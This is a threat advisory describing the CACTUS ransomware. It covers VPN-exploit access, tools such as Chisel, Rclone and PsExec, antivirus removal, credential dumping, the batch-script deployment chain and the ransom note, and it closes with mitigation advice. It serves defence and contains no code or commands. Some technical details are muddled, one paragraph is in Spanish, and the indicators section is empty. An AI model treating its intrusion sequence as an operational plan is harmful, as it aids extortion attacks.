New emerging ransomware called CACTUS

Ransomware

EXECUTIVE OVERVIEW

A new strain of ransomware targeting large commercial entities has been identified and dubbed CACTUS; it exploits documented vulnerabilities in VPN devices to gain initial access. According to researchers, CACTUS Ransomware has been active since at least March of this year.

WAY OF OPERATING

As observed in the research, CACTUS implements an overlapping set of tactics, techniques and procedures (TTPs) to compromise its victims. These include the use of tools such as Chisel, Rclone, TotalExec, scheduled tasks and custom scripts to disable security software and distribute the ransomware binary.

ACCESS

To gain initial access, the CACTUS ransomware uses known vulnerabilities in VPN devices, exploiting a file called ntuser[.]dat inside C:\ProgramData to pass an AES key that will decrypt the RSA public key to decrypt the binary, which will establish the backdoor via SSH to the C&C that it will use for persistent execution through scheduled tasks.

Once inside the network, the threat actor performs an initial internal scan via SoftPerfect Network Scanner (netscan). PowerShell commands are executed to enumerate endpoints, view Windows 4624 security events to identify user accounts and ping remote endpoints. The output of these commands is saved to text files on the host machine. The output files are subsequently used for execution of the ransomware binary.

To maintain persistence within the environment, the threat actor attempts to create a number of remote access methods through legitimate tools such as Splashtop, AnyDesk and SuperOps RMM, along with Cobalt Strike and the use of Chisel, a SOCKS5 proxy tool. Chisel helps funnel traffic through firewalls to provide hidden communications to the threat actor's C2 that could allow additional scripts and tools to be extracted on the endpoint.

Once the threat author has set the correct access level, he executes a batch script that leverages msiexec to uninstall common antivirus software via the software GUID.

Subsequently for lateral movement, the threat actor attempts to dump users' web browser credentials and manually search the disk for a file containing passwords. In addition, they may also attempt to dump LSASS credentials for further privilege escalation. Then, an additional batch script is leveraged to add privileged accounts to remote endpoints.

Ransomware

HOW ENCRYPTION IS EXECUTED

For Ransomware execution, threat actors use common exfiltration tools, such as Rclone, to automatically extract files to cloud storage and subsequently execute a script ( f1[.]bat ) also observed in BLACKBASTA ransomware operations known as TotalExec[.]ps1 that uses PsExec to automate the implementation of the encryptor. The script is initially used to create a new administrator user account which then adds a second script called f2[.]bat as an automatic machine-level execution before rebooting the device. The f2[.]bat is a batch script that is used to extract the ransomware encryptor binary with 7zip before deleting the zip file and running the binary with a flag set that allows the binary to run. PsExec then executes it remotely on the list of devices in the ips[.]txt file created earlier.

RANSOM NOTE

Una vez se ejecuta el cifrado de los archivos de la víctima, se ejecutan los modos de configuración que le permitirá al binario copiarse a sí mismo en la ruta C:\ProgramData\ {Victim_ID} [.]exe, por ejemplo: C:\ProgramData\abc1-d2ef-gh3i4jkl[.]exe.

Next, the ransomware writes a hex-encoded configuration file wrapped with junk data to C:\ProgramData[.]dat containing the path to the original exe, a base64 string that was passed with the command line argument "-i" with any other command line arguments. The hexadecimal string is further obfuscated by pushing the alignment of each two-character byte representation into one character to subsequently execute the scheduled task.

The decryption mode is then executed using the AES algorithm and the resulting plain text is added to an RSA public key object.

Once the encryption is executed the files are appended with the extension "cts\d" and the last character is a swappable digit. Then a ransom note called "cAcTuS[.]readme[.]txt" is created with details on how the victim can negotiate via TOX chat.

MITIGATION

The following is recommended:

Generate a custom rule for blocking IOC's in perimeter incoming profiles.
Phishing campaigns are characterized by spelling mistakes or design errors. Check the content carefully, and be wary of emails with imperfections.
Be wary of alarming emails. If a message tells you or encourages you to make hasty or time-sensitive decisions, it is probably phishing.
Have anti-spam systems for e-mails, thus reducing the chances of infection through massive e-mail malspam campaigns.
Protect the RDP protocol:

Disable RDP services, if not necessary. Disabling unused and unnecessary services helps reduce your exposure to security vulnerabilities, and is a good security practice.
If it is not possible to close them, limit the source addresses that can access the ports.
Protect access to RDP systems by locking the local system instead of the remote system. Even if the former has no value, the RDP session will only be protected by limiting access to the client system.
Disconnect RDP sessions instead of blocking them, this invalidates the current session, preventing an automatic reconnection of the RDP session without credentials.
Bidirectionally block TCP port 3389 using a firewall or make it accessible only through a private VPN. o Enable network level authentication (NLA).

Have periodic backup policies that are stored outside the organizational network.
Scan all attachments, before opening them, with an antivirus that detects behavior to combat ransomware.
Maintain a good information backup strategy: backup systems that must be isolated from the network; and security policies. This will help neutralize the attack, restore operations and avoid paying the ransom.
Upgrade Windows computers to the latest versions.
Never follow the instruction to disable security features, if an e-mail or document requests it.
Establish security policies in the system to prevent the execution of files from directories commonly used by Ransomware (App Data, Local App Data, etc.).
Maintain access control lists for network mapped drives restricting write privileges. With this you will be able to identify the impact generated by the file encryption, understanding that the information hijacking will occur on all the mapped network drives on the victim computer.
Follow international standards such as ISO 27001:2013 in its control A.7.2.2 "Awareness with education and training in information security" or NIST PR.AT-1: "All users are trained and informed", in order to have bases to disseminate educational campaigns oriented at user level regarding the correct use of technological tools, emphasizing how to proceed when receiving emails from unknown origins, in order to prevent its users from being victims of malicious entities.

COMMITMENT INDICATORS